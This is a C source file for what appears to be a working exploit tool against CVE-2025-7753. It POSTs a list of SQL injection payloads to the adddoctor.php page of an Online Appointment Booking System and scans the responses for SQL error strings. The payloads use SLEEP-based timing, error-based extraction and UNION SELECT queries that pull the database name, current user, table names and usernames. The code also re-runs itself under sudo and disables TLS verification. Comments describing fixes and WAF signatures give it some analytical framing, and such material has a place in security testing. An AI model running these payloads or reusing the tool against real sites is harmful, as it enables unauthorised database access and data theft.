# gcc exploit.c argparse.c -o CODE_PROJECT -lcurl
# ./CODE_PROJECT -u http://127.0.0.1
Verbose mode:
# ./CODE_PROJECT -u http://127.0.0.1 -v
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include "argparse.h"
#include <curl/curl.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
/* Size in bytes (including the terminating NUL) of the buffer that holds the
 * assembled request URL in sendPayload(). */
#define FULL_URL 2500
/* Size in bytes (including the terminating NUL) of the POST body buffer. */
#define POST_DATA 1024
/* Set by the "-v" option; enables extra console output and CURLOPT_VERBOSE. */
int verbose = 0;
/* Becomes 1 the first time a response body matches one of the error-string
 * markers in sendPayload(); it is never cleared afterwards. */
int success = 0;
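/*
 * Report which platform this binary was built for and refuse to continue on
 * anything other than Linux.
 *
 * The decision is made at preprocessor time from compiler-predefined macros;
 * on a non-Linux build the process prints a message and exits with status 1,
 * on Linux it prints a confirmation and returns.
 *
 * Why __APPLE__ instead of TARGET_OS_MAC: TARGET_OS_MAC is only defined by
 * <TargetConditionals.h>, which this file does not include, so a macOS build
 * evaluated it as 0 and fell through to the "Unknow Os" branch.  __APPLE__ is
 * predefined by the compiler and needs no header.
 *
 * Note: "\e" in the format strings is a GCC/Clang extension for ESC (0x1b).
 */
void checkSystem(void)
{
#if defined(_WIN32)
    printf("\e[1;31m[-] Error Run Exploit !\e[0m\n");
    printf("\e[1;31m[-] Your Os : Windows 32 bit / 64 bit !\e[0m\n");
    printf("\e[1;31m[-] Please Change Your System on Linux !\e[0m\n");
    exit(1);
#elif defined(__APPLE__)
    printf("\e[1;31m[-] Error Run Exploit !\n");
    printf("\e[1;31m[-] Your Os : MacOS !\n");
    printf("\e[1;31m[-] Please Change Your System on Linux !\e[0m\n");
    exit(1);
#elif defined(__linux__)
    printf("\e[1;36m[+] Exploit started successfully...\e[0m\n");
    printf("\e[1;36m[+] Your Os : Linux !\e[0m\n");
#else
    printf("\e[1;31m[-] Error Run Exploit !\e[0m\n");
    printf("\e[1;31m[-] Your Os : Unknow Os !\e[0m\n");
    printf("\e[1;31m[-] Please Change Your System on Linux !\e[0m\n");
    exit(1);
#endif
}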
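/*
 * Re-launch the program under sudo when not running as root; when already
 * root, print a confirmation and return.
 *
 * If execvp() returns, the relaunch failed: the reason is reported with
 * perror() and the process exits with a non-zero status.  The original
 * reached this point and then ran a hand-written `syscall` sequence whose
 * operand lacked the `$` immediate prefix (`mov 0x3C, %rax` is a load from
 * address 0x3C, and rax was not declared clobbered), so the failure path
 * crashed with SIGSEGV instead of exiting; even as intended it would have
 * exited with status 0 after a failure.
 *
 * Behaviour kept from the original that a reader should be aware of:
 *  - The relaunch hard-codes "./CODE_PROJECT" and passes no options, so the
 *    sudo'd process runs without the caller's -u/-v arguments and only works
 *    when started from the directory that holds the binary.
 *  - Nothing else in this file needs root; the program only issues HTTP
 *    requests, so running it as root is unnecessary privilege.
 */
void checkPer(void)
{
    if (getuid() != 0)
    {
        printf("===================================================\e[0m\n");
        printf("[-] Not running as root. Trying with sudo...\e[0m\n");
        char *args[] = {"sudo", "./CODE_PROJECT", NULL};
        execvp("sudo", args);
        /* Only reached when execvp() itself failed; errno says why. */
        perror("[-] execvp failed !");
        exit(EXIT_FAILURE);
    }
    printf("\e[1;36m[+] Running as root! Exploit continues...\e[0m\n");
    printf("===================================================\e[0m\n");
}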
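/* Growable byte buffer filled by write_cb().  `buffer` is heap-owned by the
 * caller (freed with free()) and is NUL-terminated after every successful
 * append; it stays NULL until the first write. */
struct Mem
{
    char *buffer; /* realloc'd data, NULL until the first chunk arrives */
    size_t len;   /* bytes stored, not counting the terminating NUL */
};

/*
 * libcurl CURLOPT_WRITEFUNCTION callback: append size*nmemb bytes from ptr to
 * the struct Mem that userdata points to, keeping the buffer NUL-terminated.
 *
 * Returns size*nmemb on success.  Returning any other value makes libcurl
 * abort the transfer with CURLE_WRITE_ERROR; that is used here both for an
 * allocation failure and for size arithmetic that would wrap size_t (the
 * original computed size*nmemb and len+total+1 unchecked).  On failure the
 * existing buffer and length are left untouched, so the caller can still
 * free() the buffer.
 */
size_t write_cb(void *ptr, size_t size, size_t nmemb, void *userdata)
{
    struct Mem *m = userdata;

    /* Neither size*nmemb nor len+total+1 may wrap around. */
    if (size != 0 && nmemb > SIZE_MAX / size)
    {
        return 0;
    }
    size_t total = size * nmemb;
    if (total > SIZE_MAX - 1 - m->len)
    {
        return 0;
    }

    /* Keep the old pointer until realloc() succeeds so nothing leaks. */
    char *grown = realloc(m->buffer, m->len + total + 1);
    if (!grown)
    {
        return 0;
    }
    m->buffer = grown;
    if (total > 0)
    {
        memcpy(m->buffer + m->len, ptr, total);
    }
    m->len += total;
    m->buffer[m->len] = '\0';
    return total;
}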
/*
 * Probe strings that sendPayload() sends one at a time in the "username"
 * field of the POST body, after URL-encoding each with curl_easy_escape().
 * Adjacent string literals are concatenated by the compiler, so one entry
 * may span several source lines; the entry count is taken with sizeof in
 * sendPayload().
 *
 * Defensive note: these fragments (SLEEP(), RLIKE, UNION SELECT,
 * INFORMATION_SCHEMA, "-- ") are exactly what a WAF rule or a log search on
 * the target's access logs would key on when looking for this probe.
 */
const char *payload[] =
{
"11' AND (SELECT 9158 FROM (SELECT(SLEEP(5)))QYZI)-- LGFz",
"11' RLIKE (SELECT (CASE WHEN (1872=1872) THEN 11 ELSE 0x28 END))-- AfYm",
"11' AND (SELECT 5118 FROM (SELECT COUNT(*), CONCAT(0x717a627871,"
"' OR IF(1=1, SLEEP(5), 0)--+"
"(SELECT (ELT(5118=5118,1))),0x7176707171,FLOOR(RAND()*2))x "
"FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- puZg",
"11' UNION SELECT null, database(), null, null-- -",
"11' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT user()), FLOOR(RAND()*2))x "
"FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- -",
"11' UNION SELECT null, table_name, null, null FROM information_schema.tables WHERE table_schema=database()-- -",
"11' AND 1=0 UNION SELECT null, username, null, null FROM users LIMIT 1-- -"
};
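/*
 * Send every entry of payload[] to
 * <url>/Online-Appointment-Booking-System-master/admin/adddoctor.php as the
 * "username" field of a form POST and scan each response body for the SQL
 * error markers in rq[].  A match prints the CVE-2025-7753 verdict and sets
 * the global `success`; the global `verbose` adds request/response dumps.
 *
 * url: base URL of the target; one trailing '/' is stripped.  Must be
 *      non-NULL (main() checks the -u option before calling).
 *
 * Host-side changes from the original (the requests sent are unchanged):
 *  - No hand-written `syscall` exits.  curl_easy_init() failure, a failed
 *    URL-encoding and an over-long URL report the problem and return after
 *    releasing what was allocated (the original fell through with a NULL
 *    `encode` into snprintf("%s") if the inline exit did not terminate).
 *  - A failed curl_easy_perform() prints curl_easy_strerror() and stops the
 *    loop.  The original replaced the process with `ping -c 5 127.0.0.1`
 *    through a raw execve syscall (pinging localhost, not the target) and
 *    never returned, leaving curl state and heap memory unreleased.
 *  - chunk.len is rewound before each request so every response is examined
 *    on its own.  The original appended all responses into one buffer, so
 *    the printed "Response Server" grew with every payload and a marker hit
 *    in an early response kept matching for all later ones.
 *  - The "not found" branch is driven by a per-response `found` flag; the
 *    global `success` still records whether any payload matched.
 *  - The verbose "Input Url / Encode Url" banner is printed once as its
 *    static flag intended (the original test `if (send)` was inverted, so it
 *    never printed and never set the flag).
 *
 * TLS peer/host verification is disabled, as in the original, so self-signed
 * lab targets work; a network attacker can therefore also supply the
 * "response" that is inspected here.
 */
void sendPayload(const char *url)
{
    /* Substrings whose presence in a response body is taken as an SQL error
     * leaking through the page. */
    static const char *const rq[] =
    {
        "syntax error",
        "mysql_fetch",
        "You have an error in your SQL syntax",
        "Warning: mysql",
        "Query failed",
        "unknown column",
        "Unclosed quotation mark",
        "SQLSTATE",
        "Duplicate entry",
        "mysql_num_rows",
        "MySQL server version",
        "subquery returns more than 1 row",
        "Invalid query",
        "Warning: mysqli",
        "supplied argument is not a valid MySQL result resource",
        "server version for the right syntax",
        "syntax error or access violation",
        "Column count doesn't match",
        "Unknown column in 'field list'",
        "You have an error in your SQL syntax near"
    };
    const size_t numberF = sizeof(rq) / sizeof(rq[0]);
    const size_t numberPayload = sizeof(payload) / sizeof(payload[0]);

    char cleanUrl[1024];
    char full[FULL_URL];
    char postData[POST_DATA];
    struct Mem chunk = {NULL, 0};
    struct curl_slist *h = NULL;

    CURL *c = curl_easy_init();
    if (c == NULL)
    {
        printf("\e[1;31m[-] Error Create Object Curl !\e[0m\n");
        return;
    }

    /* Bounded copy of the caller's URL; refuse rather than truncate. */
    printf("\e[1;36m[-] Check Slash on Input Url ...\n");
    int written = snprintf(cleanUrl, sizeof(cleanUrl), "%s", url);
    if (written < 0 || (size_t)written >= sizeof(cleanUrl))
    {
        printf("\e[1;31m[-] Input Url too long (max %zu bytes)\e[0m\n",
               sizeof(cleanUrl) - 1);
        goto cleanup;
    }
    size_t len = (size_t)written;
    if (len > 0 && cleanUrl[len - 1] == '/')
    {
        cleanUrl[len - 1] = '\0';
    }
    written = snprintf(full, sizeof(full),
                       "%s/Online-Appointment-Booking-System-master/admin/adddoctor.php",
                       cleanUrl);
    if (written < 0 || (size_t)written >= sizeof(full))
    {
        printf("\e[1;31m[-] Full Url too long (max %zu bytes)\e[0m\n",
               sizeof(full) - 1);
        goto cleanup;
    }
    printf("[+] Not Slash in URL !\n");

    if (verbose)
    {
        printf("\e[1;37m=========================================\e[0m\n");
        printf("\e[1;35m[+] Cleaning Reply...\e[0m\n");
        printf("\e[1;35m[+] BUFFER response -> NULL\e[0m\n");
        printf("\e[1;35m[+] LEN response -> 0\e[0m\n");
        printf("\e[1;37m=========================================\e[0m\n");
    }

    /* Transfer options shared by every request. */
    curl_easy_setopt(c, CURLOPT_ACCEPT_ENCODING, "");
    curl_easy_setopt(c, CURLOPT_FOLLOWLOCATION, 1L);
    curl_easy_setopt(c, CURLOPT_POST, 1L);
    curl_easy_setopt(c, CURLOPT_WRITEFUNCTION, write_cb);
    curl_easy_setopt(c, CURLOPT_WRITEDATA, &chunk);
    curl_easy_setopt(c, CURLOPT_CONNECTTIMEOUT, 5L);
    curl_easy_setopt(c, CURLOPT_TIMEOUT, 10L);
    /* Verification off for self-signed lab targets; see header comment. */
    curl_easy_setopt(c, CURLOPT_SSL_VERIFYPEER, 0L);
    curl_easy_setopt(c, CURLOPT_SSL_VERIFYHOST, 0L);

    h = curl_slist_append(h, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
    h = curl_slist_append(h, "Accept-Encoding: gzip, deflate, br");
    h = curl_slist_append(h, "Accept-Language: en-US,en;q=0.5");
    h = curl_slist_append(h, "Connection: keep-alive");
    h = curl_slist_append(h, "Referer: http://example.com");
    h = curl_slist_append(h, "Cache-Control: no-cache");
    h = curl_slist_append(h, "Pragma: no-cache");
    curl_easy_setopt(c, CURLOPT_HTTPHEADER, h);
    if (verbose)
    {
        curl_easy_setopt(c, CURLOPT_VERBOSE, 1L);
    }

    for (size_t p = 0; p < numberPayload; p++)
    {
        char *encode = curl_easy_escape(c, payload[p], 0);
        if (!encode)
        {
            printf("\e[1;31m[-] URL encoding failed for payload\e[0m\n");
            goto cleanup;
        }
        written = snprintf(postData, sizeof(postData),
                           "did=1111"
                           "&name=1111"
                           "&gender=female"
                           "&dob=0111-11-01"
                           "&experience=11"
                           "&specialization=111"
                           "&contact=11"
                           "&address=11"
                           "&username=%s"
                           "&pwd=11"
                           "®ion=11"
                           "&Submit=",
                           encode);
        if (written < 0 || (size_t)written >= sizeof(postData))
        {
            /* A truncated body would not carry the probe; skip it. */
            printf("\e[1;31m[-] POST body too long for this payload, skipping\e[0m\n");
            curl_free(encode);
            continue;
        }
        curl_easy_setopt(c, CURLOPT_URL, full);
        curl_easy_setopt(c, CURLOPT_POSTFIELDS, postData);

        /* Inspect each response on its own: rewind the accumulator but keep
         * its allocation for write_cb() to reuse. */
        chunk.len = 0;
        if (chunk.buffer)
        {
            chunk.buffer[0] = '\0';
        }

        CURLcode r = curl_easy_perform(c);
        if (r != CURLE_OK)
        {
            printf("\e[1;33m[!] Please Check Your Connection on Server !\e[0m\n");
            printf("\e[1;31m[-] curl_easy_perform() failed: %s\e[0m\n",
                   curl_easy_strerror(r));
            curl_free(encode);
            break;
        }

        /* Printed for the first successful request only. */
        static int shownOnce = 0;
        if (verbose && !shownOnce)
        {
            printf("\e[1;37m=========================================\e[0m\n");
            printf("\e[1;37m[+] Input Url : %s\e[0m\n", cleanUrl);
            printf("\e[1;37m[+] Encode Url : %s\e[0m\n", encode);
            printf("\e[1;37m[+] full format Url : %s\e[0m\n", full);
            printf("\e[1;37m=========================================\e[0m\n");
            shownOnce = 1;
        }
        curl_free(encode);

        long code = 0;
        printf("\e[1;36m[+] Request sent successfully\e[0m\n");
        curl_easy_getinfo(c, CURLINFO_RESPONSE_CODE, &code);
        printf("\e[1;32m[+] Http Code Response : %ld\e[0m\n", code);
        printf("\e[1;33m[+] Next Payload : %s\e[0m\n", payload[p]);

        if (code < 200 || code >= 300)
        {
            printf("\e[1;31m[-] Unexpected HTTP code %ld for this payload, trying next...\e[0m\n\n",
                   code);
            continue;
        }

        const char *body = chunk.buffer ? chunk.buffer : "";
        printf("\e[1;34m[+] The payload was successfully responded to by the server !\e[0m\n\n");
        printf("\e[1;33m-------------------------------- Response Server --------------------------------\e[0m\n");
        printf("%s\n", body);
        printf("\e[1;33m-----------------------------------------------------------------------------------\e[0m\n");
        printf("\e[1;33m[+] check Response Server...\e[0m\n");

        int found = 0;
        for (size_t a = 0; a < numberF; a++)
        {
            if (strstr(body, rq[a]) != NULL)
            {
                printf("\e[1;34m[+] A suspicious word was found: %s\e[0m\n", rq[a]);
                printf("\e[1;34m[+] The server is vulnerable to CVE-2025-7753 !\e[0m\n");
                found = 1;
                success = 1;
                break;
            }
        }
        if (!found)
        {
            printf("\e[1;31m[-] Not suspicious word was found on Response !\e[0m\n");
            if (verbose)
            {
                printf("\e[1;33m-------------------------------- Response Server --------------------------------\e[0m\n");
                printf("%s\n", body);
                printf("\e[1;33m-----------------------------------------------------------------------------------\n");
            }
            printf("\e[0;36m[*] Trying next payload...\e[0m\n\n");
            printf("\e[1;37m---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n");
        }
    }

cleanup:
    /* Every exit path releases the header list, the response buffer and the
     * easy handle; curl_slist_free_all(NULL) and free(NULL) are no-ops. */
    curl_slist_free_all(h);
    free(chunk.buffer);
    curl_easy_cleanup(c);
}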
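/*
 * Entry point: print the banner, parse -u/-v, confirm the platform and
 * privileges, and run sendPayload() against the given URL.
 *
 * Order of checks: options are parsed first so a missing -u is reported
 * before checkPer() tries to re-exec under sudo (the relaunch would prompt
 * for a password only to fail on the same missing option); checkSystem()
 * then runs before checkPer() so an unsupported platform is rejected before
 * any privilege change.
 *
 * Returns 0 on completion and 1 when no URL was given or libcurl could not
 * be initialised.  The original handled a missing URL with an inline
 * `syscall` exit and then fell through to sendPayload(NULL), which would
 * have called strlen(NULL) had the syscall not terminated the process.
 *
 * curl_global_init()/curl_global_cleanup() bracket the curl usage as the
 * libcurl contract asks; curl_easy_init() only does this lazily.
 */
int main(int argc, const char **argv)
{
    printf(
        "\e[1;31m"
        "▄▖▖▖▄▖ ▄▖▄▖▄▖▄▖ ▄▖▄▖▄▖▄▖\n"
        "▌ ▌▌▙▖▄▖▄▌▛▌▄▌▙▖▄▖ ▌ ▌▙▖▄▌\n"
        "▙▖▚▘▙▖ ▙▖█▌▙▖▄▌ ▌ ▌▄▌▄▌\n"
        " \e[1;37mByte Reaper\e[0m\n"
    );
    printf("\e[1;37m---------------------------------------------------------------------------------------------------------------------------------\e[0m\n");

    const char *targetUrl = NULL;
    struct argparse_option options[] =
    {
        OPT_HELP(),
        OPT_STRING('u', "url", &targetUrl, "Enter Target URL)"),
        OPT_BOOLEAN('v', "verbose", &verbose, "Verbose Mode"),
        OPT_END(),
    };
    struct argparse argparse;
    argparse_init(&argparse, options, NULL, 0);
    argparse_parse(&argparse, argc, argv);

    if (!targetUrl)
    {
        printf("\e[1;33m[-] Please Enter Target Url !\e[0m\n");
        printf("\e[1;33m[!] Exemple : ./exploit -u http://127.0.0.1\e[0m\n");
        return EXIT_FAILURE;
    }

    checkSystem();
    checkPer();

    if (curl_global_init(CURL_GLOBAL_DEFAULT) != 0)
    {
        printf("\e[1;31m[-] Error Init Curl !\e[0m\n");
        return EXIT_FAILURE;
    }
    sendPayload(targetUrl);
    curl_global_cleanup();
    return EXIT_SUCCESS;
}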